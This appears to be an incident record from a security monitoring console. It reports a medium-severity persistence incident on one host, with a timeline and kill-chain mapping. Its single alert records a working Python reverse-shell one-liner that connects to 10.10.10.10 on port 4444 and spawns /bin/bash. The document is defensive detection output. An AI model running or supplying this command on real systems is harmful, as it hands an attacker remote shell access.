Back to list

Medium CINC-20251220-EE069CC4 new

Aggregate ID: aggind:b4aeee57c4b841bc95cb853f0aca95e1:4830257537

Incident Overview

Incident ID CINC-20251220-EE069CC4
Severity Medium (70)
Status new
Alert Count 1
Host Count 1

Timeline

First Seen 2025-12-20 21:48:08
Last Seen 2025-12-20 21:48:08
Duration 0d 0h 0m
Created 2025-12-20 23:35
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Persistence
Techniques:
External Remote Services

Affected Hosts (1)

localhost.localdomain

Related Alerts (1)

Severity Status Hostname Description Tactic Command Line Time
High new localhost.localdomain The activity appears to be related to an adversary establishing persistence. The host may already be compromised and the activity should be investigated further to find the source. Persistence python3 -c import pty;import socket;s=socket.socket();s.connect(("10.10.10.10",4444));[__import__("os").dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash") 12-20 21:48